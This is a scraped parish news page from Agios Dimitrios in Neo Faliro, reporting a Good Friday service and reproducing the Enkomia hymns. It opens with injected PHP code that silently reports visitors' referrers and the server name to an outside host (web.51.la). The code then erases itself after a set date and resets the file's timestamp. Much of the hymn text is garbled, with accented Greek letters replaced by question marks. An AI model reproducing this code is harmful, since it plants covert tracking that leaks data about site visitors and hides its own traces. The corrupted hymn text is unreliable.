check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Create PDF Recommend Print

Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Π?ς κηδε?σω σε Υ??;

Σήμερα, Μ. Παρασκευή και περί ώρα 10:00 π.μ. τελέστηκε ο Μέγας Εσπερινός και η Αποκαθήλωσις. Πλήθος πιστών παρευρέθηκε και παρακολούθησε με κατάνυξη. Ακολουθούν βίντεο και φωτογραφίες.

Δείτε τα Εγκώμια.

 {loadposition flickr20120413}

 

 

 

 

Τα Εγκώμια

 Πηγή: http://users.otenet.gr/~gmcr/bible/Egkomia.htm

ΣΤΑΣΙΣ ΠΡΩΤΗ

? ζω? ?ν τ?φ?, κατετ?θης Χριστ?, κα? ?γγ?λων στρατια? ?ξεπλ?ττοντο συγκατ?βασιν δοξ?ζουσαι τ?ν σ?ν.

? ζω? π?ς θν?σκεις; π?ς κα? τ?φ? ο?κε?ς; το? θαν?του τ? βασ?λειον λ?εις δ?, κα? το? ?δου το?ς νεκρο?ς ?ξανιστ?ς.

Μεγαλ?νομ?ν σε, ?ησο? Βασιλε?, κα? τιμ?μεν τ?ν Ταφ?ν κα? τ? Π?θη σου, δι' ?ν ?σωσας ?μ?ς ?κ τ?ς φθορ?ς.

Μ?τρα γ?ς ? στ?σας, ?ν σμικρ? κατοικε?ς, ?ησο? παμβασιλε? τ?φ? σ?μερον, ?κ μνημ?των το?ς θαν?ντας ?νιστ?ν.

?ησο? Χριστ? μου, Βασιλε? το? παντ?ς, τ? ζητ?ν το?ς ?ν τ? ?δ? ?λ?λυθας; ? τ? γ?νος ?πολ?σαι τ?ν βροτ?ν.

? Δεσπ?της π?ντων, καθορ?ται νεκρ?ς, κα? ?ν μν?ματι καιν? κατατ?θεται, ? κεν?σας τ? μνημε?α τ?ν νεκρ?ν.

? ζω? ?ν τ?φ? κατετ?θης Χριστ?, κα? θαν?τ? σου τ?ν θ?νατον ?λεσας, κα? ?π?γασας τ? κ?σμ?, τ?ν ζω?ν.

Μετ? τ?ν κακο?ργων, ?ς κακο?ργος Χριστ?, ?λογ?σθης δικαι?ν ?μ?ς ?παντας, κακουργ?ας το? ?ρχα?ου πτερνιστο?.

? ?ρα?ος κ?λλει, παρ? π?ντας βροτο?ς, ?ς ?νε?δεος νεκρ?ς καταφα?νεται, ? τ?ν φ?σιν ?ραΐσας το? παντ?ς.

?δης π?ς ?πο?σει, Σ?τερ παρουσ?αν τ?ν σ?ν, κα? μ? θ?ττον συνθλασθε?η σκοτο?μενος, ?στραπ?ς φωτ?ς σου α?γλη ?κτυφλωθε?ς;

?ησο? γλυκ? μοι, κα? σωτ?ριον φ?ς, τ?φ? π?ς ?ν σκοτειν? κατακ?κρυψαι; ? ?φ?του, κα? ?ρρ?του ?νοχ?ς!

?πορε? κα? φ?σις, νοερ? κα? πληθ?ς, ? ?σ?ματος Χριστ? τ? μυστ?ριον, τ?ς ?φρ?στου κα? ?ρρ?του σου ταφ?ς.

? Ζω? θαν?τ?, θα?μα! Π?ς ?μιλε?; Π?ς θαν?τ? καταργε?ται ? θ?νατος; ?κ θαν?ντος π?ς πηγ?ζει δ? ζω?;

? θαυμ?των ξ?νων! ? πραγμ?των καιν?ν! ? πνο?ς μοι χορηγ?ς ?πνους φ?ρεται, κηδευ?μενος χερσ? το? ?ωσ?φ.

Κα? ?ν ταφ? ?δυς, κα? τ?ν κ?λπων, Χριστ?, τ?ν πατρ?ων ο?δαμ?ς ?πεφο?τησας? το?το ξ?νον κα? παρ?δοξον ?μο?.

?ληθ?ς κα? π?λου, κα? τ?ς γ?ς Βασιλε?ς, ε? κα? τ?φ? σμικροτ?τ? συγκ?κλεισαι, ?πεγν?σθης π?σ? κτ?σει ?ησο?.

Σο? τεθ?ντος τ?φ?, πλαστουργ?τα Χριστ?, τ? το? ?δου ?σαλε?θη θεμ?λια, κα? μνημε?α ?νε?χθη τ?ν βροτ?ν.

? τ?ν γ?ν κατ?χων, τ? δρακ? νεκρωθε?ς, σαρκικ?ς ?π? τ?ς γ?ς ν?ν συν?χεται, το?ς νεκρο?ς λυτρ?ν τ?ς ?δου συνοχ?ς.

?κ φθορ?ς ?ν?βη, ? ζω? μου Σωτ?ρ, σο? θ?ν?ντος κα? νεκρο?ς προσφοιτ?σαντος, κα? συνθλ?σαντος το? ?δου το?ς μοχλο?ς.

?ς φωτ?ς λυχν?α, ν?ν ? σ?ρξ το? Θεο?, ?π? γ?ν ?ς ?π? μ?διον κρ?πτεται, κα? δι?κει τ?ν ?ν ?δ? σκοτασμ?ν.

Νοερ?ν συντρ?χει, στρατι?ν ? πληθ?ς, ?ωσ?φ κα? Νικοδ?μ? συστε?λα? σε, τ?ν ?χ?ρητον ?ν μν?ματι σμικρ?.

Νεκρωθε?ς βουλ?σει, κα? τεθε?ς ?π? γ?ν, ζωοβρ?τα ?ησο? μου ?ζ?ωσας, νεκρωθ?ντα παραβ?σει με πικρ?.

?λλοιο?το π?σα, κτ?σις π?θει τ? σ?? π?ντα γ?ρ σοι, Λ?γε συν?πασχον, συνοχ?α σε γιν?σκοντα παντ?ς.

Τ?ς ζω?ς τ?ν π?τραν ?ν κοιλ?? λαβ?ν, ?δης ? παμφ?γος ?ξ?μεσεν, ?ξ α??νος ο?ς κατ?πιε νεκρο?ς.

?ν καιν? μνημε??, κατετ?θης Χριστ?, κα? τ?ν φ?σιν τ?ν βροτ?ν ?νεκα?νισας, ?ναστ?ς θεοπρεπ?ς ?κ τ?ν νεκρ?ν.

?π? γ?ς κατ?λθες, ?να σ?σ?ς ?δ?μ? κα? ?ν γ? μ? ε?ρηκ?ς το?τον Δ?σποτα, μ?χρις ?δου κατελ?λυθας ζητ?ν.

Συγκλονε?ται φ?β?, π?σα Λ?γε ? γ?, κα? φωσφ?ρος τ?ς ?κτ?νας ?π?κρυψε, το? μεγ?στου γ? κρυβ?ντος σου φωτ?ς.

?ς βροτ?ς μ?ν θν?σκεις, ?κουσ?ως Σωτ?ρ, ?ς Θε?ς δ? το?ς θνητο?ς ?ξαν?στησας, ?κ μνημ?των κα? βυθο? ?μαρτι?ν.

Δακρυ???ους θρ?νους, ?π? σε ??γν?, μητρικ?ς ? ?ησο? ?πι??α?νουσα, ?νεβ?α? π?ς κηδε?σω σε Υ??;

?σπερ σ?του κ?κκος, ?ποδ?ς κ?λπους γ?ς, τ?ν πολ?χουν ?ποδ?δωκας ?σταχυν, ?ναστ?σας το?ς βροτο?ς το?ς ?ξ, ?δ?μ.

?π? γ?ν ?κρ?βης, ?σπερ ?λιος ν?ν, κα? νυκτ? τ? το? θαν?του κεκ?λυψαι? ?λλ' ?ν?τειλον φαιδρ?τερον Σωτ?ρ.

?ς ?λ?ου δ?σκον, ? σελ?νη Σωτ?ρ, ?ποκρ?πτει, κα? σε τ?φος ν?ν ?κρυψεν, ?κλιπ?ντα το? θαν?του σαρκικ?ς.

? ζω? θαν?του, γευσαμ?νη Χριστ?ς, ?κ θαν?του το?ς βροτο?ς ?λευθ?ρωσε, κα? το?ς π?σι ν?ν δωρε?ται τ?ν ζω?ν.

Νεκρωθ?ντα π?λαι, τ?ν ?δ?μ φθονερ?ς, ?παν?γεις πρ?ς ζω?ν τ? νεκρ?σει σου, ν?ος Σ?τερ ?ν σαρκ? φανε?ς ?δ?μ.

Νοερα? σε τ?ξεις, ?πλωμ?νον νεκρ?ν, καθορ?σαι δι' ?μ?ς ?ξεπλ?ττοντο, καλυπτ?μεναι τα?ς πτ?ρυξι Σωτ?ρ.

Καθελ?ν σε Λ?γε, ?π? ξ?λου νεκρ?ν, ?ν μνημε?? ?ωσ?φ ν?ν κατ?θετο? ?λλ' ?ν?στα σ?ζων π?ντας ?ς Θε?ς.

Τ?ν ?γγ?λων Σ?τερ, χαρμον? πεφυκ?ς, ν?ν κα? λ?πης το?τοις γ?γονας α?τιος, καθορ?μενος σαρκ? ?πνους νεκρ?ς.

?ψωθε?ς ?ν ξ?λ?, κα? το?ς ζ?ντας βροτο?ς, συνυψο?ς? ?π? τ?ν γ?ν δ? γεν?μενος, το?ς κειμ?νους δ' ?π' α?τ?ν ?ξανιστ?ς.

?σπερ λ?ων Σ?τερ, ?φυπν?σας σαρκ?, ?ς τις σκ?μνος ? νεκρ?ς ?ξαν?στασαι, ?ποθ?μενος τ? γ?ρας τ?ς σαρκ?ς.

Τ?ν πλευρ?ν ?ν?γης, ? πλευρ?ν ε?ληφ?ς, το? ?δ?μ ?ξ ?ς τ?ν Ε?αν δι?πλασας, κα? ?ξ?βλυσας κρουνο?ς καθαρτικο?ς.

?ν κρυπτ? μ?ν π?λαι, θ?εται ? ?μν?ς? σ? δ' ?πα?θριος τυθε?ς, ?νεξ?κακε, π?σαν κτ?σιν ?πεκ?θηρας Σωτ?ρ.

Τ?ς ?ξε?ποι τρ?πον, φρικτ?ν ?ντως καιν?ν; ? δεσπ?ζων γ?ρ τ?ς Κτ?σεως σ?μερον, π?θος δ?χεται, κα? θν?σκει δι' ?μ?ς.

? ζω?ς ταμ?ας, π?ς ?ρ?ται νεκρ?ς; ?κπληττ?μενοι ο? ?γγελοι ?κραζον? πως δ' ?ν μν?ματι συγκλε?εται Θε?ς;

Λογχον?κτου Σ?τερ, ?κ πλευρ?ς σου ζω?ν, τ? ζω? τ? ?κ ζω?ς ?ξωσ?σ? με, ?πιστ?ζεις κα? ζωο?ς με σ?ν α?τ?.

?πλωθε?ς ?ν ξ?λ?, συνηγ?γω βροτο?ς? τ?ν πλευρ?ν σου δ? νυγε?ς τ?ν ζω???ητον, π?σιν ?φεσιν πηγ?ζεις ?ησο?.

? ε?σχ?μων Σ?τερ, σχηματ?ζει φρικτ?ς, κα? κηδε?ει ?ς νεκρ?ν ε?σχημ?νως σε, κα? θαμβε?ται σου τ? σχ?μα τ? φρικτ?ν.

?π? γ?ν βουλ?σει, κατελθ?ν ?ς θνητ?ς, ?παν?γεις ?π? γ?ς πρ?ς ο?ρ?νια, το?ς ?κε?θεν πεπτωκ?τας ?ησο?.

Κ?ν νεκρ?ς ?ρ?θης, ?λλ? ζ?ν ?ς Θε?ς, ?παν?γεις ?π? γ?ς πρ?ς ο?ρ?νια, το?ς ?κε?θεν πεπτωκ?τας ?ησο?.

Κ?ν νεκρ?ς ?ρ?θης, ?λλ? ζ?ν ?ς Θε?ς, νεκρωθ?ντας το?ς βροτο?ς ?νεζ?ωσας, τ?ν ?μ?ν ?πονεκρ?σας νεκρωτ?ν.

? χαρ?ς ?κε?νης! ? πολλ?ς ?δον?ς! ?σπερ το?ς ?ν ?δ? πεπλ?ρωκας, ?ν πυθμ?σι φ?ς ?στρ?ψας ζοφερο?ς.

Προσκυν? τ? Π?θος, ?νυμν? τ?ν Ταφ?ν, μεγαλ?νω σου τ? κρ?τος Φιλ?νθρωπε, δι' ?ν λ?λυμαι παθ?ν φθοροποι?ν.

Κατ? σου ?ομφα?α, ?στιλβο?το Χριστ?, κα? ?ομφα?α ?σχυρο? μ?ν ?μβλ?νεται, κα? ?ομφα?α δ? τροπο?ται τ?ς ?δ?μ.

? ?μν?ς τ?ν ?ρνα, βλ?πουσα ?ν σφαγ?, τα?ς α?κ?σι βαλλομ?νη ?λ?λαζε, συγκινο?σα κα? τ? πο?μνιον βο?ν.

Κ?ν ?νθ?πτη τ?φ?, κ?ν ε?ς ?δου μολ?ς, ?λλ? Σ?τερ κα? το?ς τ?φους ?κ?νωσας, κα? τ?ν ?δην ?πεγ?μνωσας, Χριστ?.

?κουσ?ως Σ?τερ, κατελθ?ν ?π? γ?ν, νεκρωθ?ντας το?ς βροτο?ς ?νεζ?ωσας, κα? ?ν?γαγες ?ν δ?ξ? πατρικ?.

Τ?ς Τρι?δος ? ε?ς, ?ν σαρκ? δι' ?μ?ς, ?πονε?διστον ?π?μεινε θ?νατον? φρ?ττει ?λιος, κα? τρ?μει δ? ? γ?.

?ς πικρ?ς ?κ κρ?νης, τ?ς ?ο?δα φυλ?ς, ο? ?π?γονοι ?ν λ?κκ? κατ?θεντο, τ?ν τροφ?α μανναδ?την ?ησο?ν.

? Κριτ?ς ?ς κριτ?ς, πρ? Πιλ?του κριτο?, κα? παρ?στατο κα? θ?νατον ?δικον, κατεκρ?θη δι? ξ?λου σταυρικο?.

?λαζ?ν ?σρα?λ, μιαιφ?νε λα?, τι παθ?ν τ?ν Βαραββ?ν ?λευθ?ρωσας; τ?ν Σωτ?ρα δ? παρ?δωκας Σταυρ?;

? χειρ? σου πλ?σας, τ?ν ?δ?μ ?κ τ?ς γ?ς, δι' α?τ?ν τ? φ?σει γ?γονας ?νθρωπος, κα? ?στα?ρωσαι βουλ?ματι τ? σ?.

?πακο?σας Λ?γε, τ? ?δ?? Πατρ?, μ?χρις ?δου το? δεινο? καταβ?βηκας, κα? ?ν?στησας τ? γ?νος τ?ν βροτ?ν.

Ο?μοι φ?ς το? Κ?σμου! ο?μοι φ?ς τ? ?μ?ν! ?ησο? μου ποθειν?τατε ?κραζεν, ? Παρθ?νος θρην?δο?σα γοερ?ς.

Φθονουργ?, φονουργ?, κα? ?λ?στορ λα?, κ?ν σινδ?νας κα? α?τ? τ? σουδ?ριον, α?σχ?νθητι, ?ναστ?ντος το? Χριστο?.

Δε?ρο δ? μιαρ?, φονευτ? μαθητ?, κα? τ?ν τρ?πον τ?ς κακ?ας σου δε?ξ?ν μοι, δι' ?ν γ?γονας προδ?της το? Χριστο?.

?ς φιλ?νθρωπ?ς τις, ?ποκρ?ν? μωρ? κα? τυφλ? πανωλεθρ?τατε ?σπονδε, ? τ? μ?ρον πεπρακ?ς δι? τιμ?ς.

Ο?ραν?ου μ?ρου, πο?αν ?σχες τιμ?ν; το? τιμ?ου τι ?δ?ξω ?ντ?ξιον; λ?σσαν ε?ρες καταρ?τατε σατ?ν.

Ε? φιλ?πτωχος ε?, κα? τ? μ?ρον λυπ?, κενουμ?νου ε?ς ψυχ?ς ?λαστ?ριον, π?ς χρυσ? ?πεμπολε?ς τ?ν Φωταυγ?;

? Θε? κα? Λ?γε, ? χαρ? ? ?μ?, π?ς ?ν?γκω σου ταφ?ν τ?ν τρι?μερον ν?ν σπαρ?ττομαι τ? σπλ?γχνα μητρικ?ς.

Τ?ς μοι δ?σει ?δωρ, κα? δακρ?ων πηγ?ς, ? Θε?νυμφος Παρθ?νος ?κρα?γαζεν, ?να κλα?σω τ?ν γλυκ?ν μου ?ησο?ν;

? βουνο? κα? ν?παι, κα? ?νθρ?πων πληθ?ς, κλα?σατε κα? π?ντα θρην?σατε, σ?ν ?μο? τ? το? Θεο? ?μ?ν Μητρ?.

Π?τε ?δω Σ?τ?ρ, σε τ? ?χρονον φ?ς, τ?ν χαρ?ν κα? ?δον?ν τ?ς καρδ?ας μου; ? Παρθ?νος ?νεβ?α γοερ?ς.

Κ?ν ?ς π?τρα Σ?τερ, ? ?κρ?τομος σ?, κατεδ?ξω τ?ν τομ?ν, ?λλ' ?π?γασας, ζ?ν τ? ?ε?θρον ?ς πηγ? ?ν τ?ς ζω?ς.

?ς ?κ κρ?νης μι?ς, τ?ν διπλο?ν ποταμ?ν, τ?ς πλευρ?ς σου προχεο?σης ?ρδ?μενοι, τ?ν ?θ?νατον καρπο?μεθα ζω?ν.

Θ?λων ?φθης Λ?γε, ?ν τ? τ?φ? νεκρ?ς, ?λλ? ζ?ς, κα? το?ς βροτο?ς ?ς προε?ρηκας, ?ναστ?σει σου Σωτ?ρ μου ?γερε?ς.

Δ?ξα...

?νυμνο?μεν Λ?γε σε τ?ν π?ντων Θε?ν, σ?ν Πατρ? κα? τ? ?γ?? σου Πνε?ματι, κα? δοξ?ζομεν τ?ν θε?αν σου Ταφ?ν.

Κα? ν?ν...

Μακαρ?ζομ?ν σε, Θεοτ?κε ?γν?, κα? τιμ?μεν τ?ν Ταφ?ν τ?ν τρι?μερον, το? Υ?ο? σου κα? Θεο? ?μ?ν πιστ?ς.

? ζω? ?ν τ?φ?, κατετ?θης Χριστ?, κα? ?γγ?λων στρατια? ?ξεπλ?ττοντο, συγκατ?βασιν δοξ?ζουσαι τ?ν σ?ν.

 

 

ΣΤΑΣIΣ ΔΕΥΤΕΡΑ

?ξι?ν ?στι, μεγαλ?νειν σε τ?ν Ζωοδ?την, τ?ν ?ν τ? Σταυρ? τ?ς χε?ρας ?κτε?ναντα, κα? συντρ?ψαντα τ? κρ?τος το? ?χθρο?.

?ξι?ν ?στι, μεγαλ?νειν σε τ?ν π?ντων Κτ?στην? το?ς σο?ς γ?ρ παθ?μασιν ?χομεν, τ?ν ?π?θειαν ?υσθ?ντες τ?ς φθορ?ς.

?φριξεν ? γ?, κα? ? ?λιος Σ?τερ ?κρ?βη, σο? το? ?νεσπ?ρου φωτ?ς Χριστ?, ?ν τ? τ?φ? δ?ντος ν?ν σωματικ?ς.

?πνωσας, Χριστ?, τ?ν φυσ?ζωον ?πνον ?ν τ?φ?, κα? βαρ?ως ?πνου ?ξ?γειρας, το? τ?ς ?μαρτ?ας, τ? τ?ν ?νθρ?πων γ?νος.

Μ?νη γυναικ?ν, χωρ?ς π?νων ?τεκ?ν σε Τ?κνον, π?νους δ? ν?ν φ?ρω π?θει τ? σ?, ?φορ?τους, ?νεβ?α ? Σεμν?.

?νω σε Σωτ?ρ, ?χωρ?στως τ? Πατρ? συν?ντα, κ?τω δ? νεκρ?ν ?πλωμ?νον γ?, καθορ?ντα φρ?ττει ν?ν τ? Σεραφ?μ.

Ρ?γνυται ναο?, καταπ?τασμα τ? σ? Σταυρ?σει, κρ?πτουσι φωστ?ρες Λ?γε τ? φ?ς, σου κρυβ?ντος το? ?λίου ?π? γ?ν.

Γ?ς ? καταρχ?ς, μ?ν? νε?ματι π?ξας τ?ν γ?ρον, ?πνους ?ς βροτ?ς καθυπ?δυ γ?ν? τ? θε?ματι δε φρ?ξον ο?ραν?.

?δυς ?π? γ?ν ? τ?ν ?νθρωπον χειρ? σου πλ?σας, ?ν' ?ξαναστ?σ?ς το? πτ?ματος, τ?ν βροτ?ν τ? στ?φη, πανσθενεστ?τ? κρ?τει.

Θρ?νον ?ερ?ν, δε?τε ?σωμεν Χριστ? θαν?ντι, ?ς α? Μυροφ?ροι γυνα?κες πρ?ν, ?ν' ?κο?σωμεν τ? Χα?ρε σ?ν α?τα?ς.

Μ?ρον ?ληθ?ς, σ? ?κ?νωτον ?π?ρχεις Λ?γε? ?θεν σοι κα? μ?ρα προσ?φερον, Μυροφ?ροι σοι τ? ζ?ντι, ?ς νεκρ?.

?δου μ?ν ταφε?ς, τ? βασ?λεια Χριστ? συντρ?βεις, θ?νατον θαν?τ? δ? θανατο?ς, κα? φθορ?ς λυτρο?σαι το?ς γηγενε?ς.

Ρε?θρα τ?ς ζω?ς, ? προχ?ουσα Θεο? σοφ?α, τ?φον ?πεισδ?σα ζωοποιε?, το?ς ?ν το?ς ?δ?τοις ?δου μυχο?ς.

?να τ?ν βροτ?ν, καινουργ?σω συντριβε?σαν φ?σιν, π?πληγμαι θαν?τ? θ?λων σαρκ?. Μ?τερ ο?ν μ? κ?πτου το?ς ?δυρμο?ς.

?δυς ?π? γ?ν, ? φωσφ?ρος τ?ς δικαιοσ?νης κα? νεκρο?ς ?σπερ ?ξ ?πνου ?ξ?γειρας, ?κδι?ξας ?παν, τ? ?ν τ? ?δ? σκ?τος.

Κ?κκος διφυ?ς, ? φυσ?ζωος ?ν γ?ς λαγ?σι, σπε?ρεται σ?ν δ?κρυσι σ?μερον, ?λλ' ?ναβλαστ?σας, Κ?σμον χαροποι?σει.

?πτηξεν ?δ?μ, Θεο? βα?νοντος ?ν Παραδε?σ?, χα?ρει δ? πρ?ς ?δην φοιτ?σαντος, πεπτωκ?ς τ? πρ?ην, κα? ν?ν ?ξεγερθείς.

Σπ?νδει σοι χο?ς, ? τεκο?σ? σε Χριστ? δακρ?ων, σαρκικ?ς κατατεθ?ντι ?ν μν?ματι, ?κβο?σα, Τ?κνον, ?ν?στα ?ς προ?φης.

Τ?φ? ?ωσ?φ, ε?λαβ?ς σε τ? καιν? συγκρ?πτων, ?μνους ?ξοδ?ους θεοπρεπε?ς, το?ς συμμ?κτοις θρ?νοις μ?λπει σοι Σωτ?ρ.

?λοις σε Σταυρ?, πεπαρμ?νον ? σ? Μ?τηρ Λ?γε, βλ?ψασα το?ς ?λοις λ?πης πικρ?ς, β?βληται κα? β?λεσι τ?ν ψυχ?ν.

Σ? τ?ν το? παντ?ς γλυκασμ?ν ? Μ?τηρ καθορ?σα, π?μα ποτιζ?μενον τ? πικρP?57;ν, βρ?χει δ?κρυσι τ?ς ?ψεις γοερ?ς.

Τ?τρωμαι δειν?ς, κα? σπαρ?ττομαι τ? σπλ?γχνα Λ?γε, βλ?πουσα σφαγ?ν σου τ?ν ?δικον, ? Παρθ?νος ?νεβ?α ?ν κλαυθμ?.

?μμα τ? γλυκ?, κα? τ? χε?λη σου π?ς μ?σω Λ?γε; π?ς νεκροπρεπ?ς δ? κηδε?σω σε; Μετ? φρίκης ?νεβ?α ?ωσ?φ.

?μνους ?ωσ?φ, κα? Νικ?δημος ?πιταφ?ους, ?δουσι Χριστ? νεκρωθ?ντι ν?ν? σ?ν α?το?ς δ? μελωδε? τ? Σεραφ?μ.

Δ?νεις ?π? γ?ν, Σ?τερ ?λιε δικαιοσ?νης? ?θεν ? τεκο?σα Σελ?νη σε, τα?ς λ?παις ?κλε?πει, σ?ς θ?ας στερουμ?νη.

?φριξεν ?ρ?ν, Σ?τερ, ?δης σε τ?ν ζωοδ?την, πλο?τον τ?ν ?κε?νου σκυλε?οντα, κα? το?ς ?π' α??νος, νεκρο?ς ?ξανιστ?ντα.

?λιος φαιδρ?ν, ?παστρ?πτει μετ? ν?κτα Λ?γε? κα? σ? δ' ?ναστ?ς ?ξαστρ?ψειας, μετ? θ?νατον φαιδρ?ς ?ς ?κ παστο?.

Γ? σε πλαστουργ?, ?π? κ?λπους δεξαμ?νη τρ?μ?, συσχεθε?σα Σ?τερ τιν?σσεται, ?φυπν?σασα νεκρο?ς τ? τιναγμ?.

Μ?ροις σε Χριστ?, ? Νικ?δημος κα? ? Ε?σχ?μων, ν?ν καινοπρεπ?ς περιστε?λαντες, ?νεβ?ων? φρ?ξον, ?πασα ? γ?.

?δυς Φωτουργ?, κα? συν?δυ σοι τ? φ?ς ?λ?ου? τρ?μω δ? ? κτ?σις συν?χεται, π?ντων σε κηρ?ττουσα Ποιητ?ν.

Λ?θος λαξευτ?ς τ?ν ?κρ?γωνον καλ?πτει λ?θον? ?νθρωπος θνητ?ς δ' ?ς θνητ?ν Θε?ν, κρ?πτει ν?ν τ? τ?φ?? φρ?ξον ? γ?!

?δε Μαθητ?ν, ?ν ?γ?πησας κα? σ?ν Μητ?ρα, Τ?κνον, κα? φθογγ?ν δ?ς γλυκ?τατον, ?νεβ?α θρην?δο?σα ? ?γν?.

Σ? ?ς ?ν ζω?ς, χορηγ?ς Λ?γε το?ς ?ουδα?ους, ?ν Σταυρ? ταθε?ς ο?κ ?ν?κρωσας, ?λλ' ?ν?στησας κα? το?των το?ς νεκρο?ς.

Κ?λλος Λ?γε πρ?ν, ο?δ? ε?δος ?ν τ? π?σχειν ?σχες, ?λλ' ?ξαναστ?ς ?περ?λαμψας, καλλωπ?σας το?ς βροτο?ς θε?αις α?γα?ς.

?δυς τ? σαρκ?, ? ?ν?σπερος ε?ς γ?ν φωσφ?ρος? κα? μ? φ?ρων βλ?πειν ? ?λιος, ?σκοτ?σθη μεσημβρ?ας ?ν ?κμ?.

?λιος ?μο?, κα? σελ?νη σκοτισθ?ντες Σ?τερ, δο?λους ε?νοο?ντας ε?κ?νιζον, ο? μελα?νας ?μφι?ννυνται στολ?ς.

Ο?δ? σε Θε?ν, ?κατ?νταρχος κ?ν ?νεκρ?θης, π?ς σ? ο?ν Θε? μου ψα?σω χερσ?; φρ?ττω, ?νεβ?α ? ?ωσ?φ.

?πνωσεν ?δ?μ, ?λλ? θ?νατον πλευρ?ς ?ξ?γει ? σ? δ? ν?ν ?πν?σας Λ?γε Θεο?, βρ?εις ?κ πλευρ?ς σου κ?σμ? ζω?ν.

?πνωσας μικρ?ν, κα? ?ζ?ωσας το?ς τεθνε?τας, κα? ?ξαναστ?ς ?ξαν?στησας, το?ς ?πνο?ντας ?ξ α??νος, ?γαθ?.

?ρθης ?π? γ?ς, ?λλ' ?ν?βλυσας τ?ς σωτηρ?ας, τ?ν ο?νον ζω???υτε ?μπελε. Δοξ?ζω τ? Π?θος κα? τ?ν Σταυρ?ν.

Π?ς ο? νοερο?, Ταγματ?ρχαι σε Σωτ?ρ ?ρ?ντες, γυμν?ν ?μαγμ?νον κατ?κριτον, ?φερον τ?ν τ?λμην τ?ν σταυρωτ?ν;

?ραβιαν?ν, σκολι?τατον γ?νος ?βρα?ων, ?γνως τ?ν ?ν?γερσιν το? ναο?? δι? τι κατ?κρινας τ?ν Χριστ?ν;

Χλα?ναν ?μπαιγμο?, τ?ν Κοσμ?τορα π?ντων ?νδ?εις, ?ς τ?ν ο?ραν?ν κατηστ?ρωσε, κα? τ?ν γ?ν ?κ?σμησε θαυμαστ?ς.

?σπερ πελεκ?ν, τετρωμ?νος τ?ν πλευρ?ν σου Λ?γε, σο?ς θαν?ντας πα?δας ?ζ?ωσας, ?πιστ?ξας ζωτικο?ς α?το?ς κρουνο?ς.

?λιον τ? πρ?ν, ?ησο?ς το?ς ?λλοφ?λους κ?πτων, ?στησεν? α?τ?ς δ? ?π?κρυψας, καταβ?λλων τ?ν το? σκ?τους ?ρχηγ?ν.

Κ?λπων πατρικ?ν, ?νεκφο?τητος με?νας, ο?κτίρμον, κα? βροτ?ς γεν?σθαι ε?δ?κησας, κα? ε?ς ?δην καταβ?βηκας Χριστ?.

?ρθη σταυρωθε?ς, ? ?ν ?δασι τ?ν γ?ν κρεμ?σας, ?πνους δ'?ν α?τ? ο?τος θ?πτεται, ? μ? φ?ρουσα ?σε?ετο δειν?ς.

Ο?μοι ? Υ??! ? ?πε?ρανδρος θρηνε? κα? λ?γει, ?ν ?ς Βασιλ?α γ?ρ ?λπιζον, κατ?κριτον ν?ν βλ?πω ?ν Σταυρ?.

Τα?τα Γαβρι?λ, μοι ?π?γγειλεν ?τε κατ?πτη, ?ς τ?ν βασιλε?αν α??νιον, ?φη ε?ναι το? Υ?ο? μου ?ησο?.

Φε?! το? Συμε?ν, ?κτετ?λεσται ? προφητε?α? ? γ?ρ σ? ?ομφα?α δι?δραμε, τ?ν καρδ?αν τ?ν ?μ?ν ?μμανου?λ.

Κ?ν το?ς ?κ νεκρ?ν, ?παισχ?νθητε ? ?ουδα?οι, ο?ς ? ζωοδ?της ?ν?στησεν, ?ν ?με?ς ?κτε?νατε φθονερ?ς.

?φριξεν ?δ?ν, τ? ??ρατον φ?ς σε Χριστ? μου, μν?ματι κρυπτ?μενον ?πνουν τε, κα? ?σκ?τασεν ? ?λιος τ? φ?ς.

?κλαιε πικρ?ς, ? παν?μωμος Μ?τηρ σου Λ?γε, ?τε ?ν τ? τ?φ? ??ρακε, σ? τ?ν ?φραστον κα? ?ναρχον Θε?ν.

Ν?κρωσιν τ?ν σ?ν, ? παν?φθορος Χριστ? σου Μ?τηρ, βλ?πουσα πικρ?ς σοι ?φθ?γγετο? μ? βραδ?νης ? ζω? ?ν το?ς νεκρο?ς.

?δης ? δε?νος, συνετρ?μαξεν ?τε σε ε?δεν, ?λιε τ?ς δ?ξ?ς ?θ?νατε, κα? ?δ?δου το?ς δεσμ?ους ?ν σπουδ?.

Μ?γα κα?, φρικτ?ν, Σ?τερ θ?αμα ν?ν καθορ?ται! ? ζω?ς γ?ρ θ?λων παρα?τιος, θ?νατον ?π?στη, ζω?σαι θ?λων π?ντας.

Ν?ττ? τ?ν πλευρ?ν, κα? ?λο?σαι Δ?σποτα τ?ς χε?ρας, πληγ?ν ?κ πλευρ?ς σου ??μενος, κα? τ?ν ?κρασ?αν, χειρ?ν τ?ν Προπατ?ρων.

Πρ?ν τ?ν τ?ς Ραχ?λ, υ??ν ?κλαυσεν ?πας κατ' ο?κον? ν?ν τ?ν τ?ς Παρθ?νου ?κ?ψατο, Μαθητ?ν χορε?α σ?ν τ? Μητρ?.

Ρ?πισμα χειρ?ν, Χριστο? δ?δωκαν ?ν σιαγ?νι, το? χειρ? τ?ν ?νθρωπον πλ?σαντος, κα? τ?ς μ?λας θλ?σαντος το? θηρ?ς.

?μνοις σου Χριστ?, ν?ν τ?ν Στα?ρωσιν κα? τ?ν Ταφ?ν τε, ?παντες πιστο? ?κθει?ζομεν, ο? θαν?του λυτρωθ?ντες σ?ταφ?.

Δ?ξα...

?ναρχε Θε?, συνα?διε Λ?γε κα? Πνε?μα, σκ?πτρα τ?ν ?ν?κτων κρατα?ωσον, κατ? πολεμ?ων ?ς ?γαθ?ς.

Κα? ν?ν...

Τ?ξασα ζω?ν, Παναμ?μητε ?γν? Παρθ?νε, πα?σον ?κκλησ?ας τ? σκ?νδαλα, κα? βρ?βευσον ε?ρ?νην ?ς ?γαθ?.

?ξι?ν ?στι, μεγαλ?νειν σε τ?ν Ζωοδ?την, τ?ν ?ν τ? Σταυρ? τ?ς χε?ρας ?κτε?ναντα, κα? συντρ?ψαντα τ? κρ?τος το? ?χθρο?.

 

 

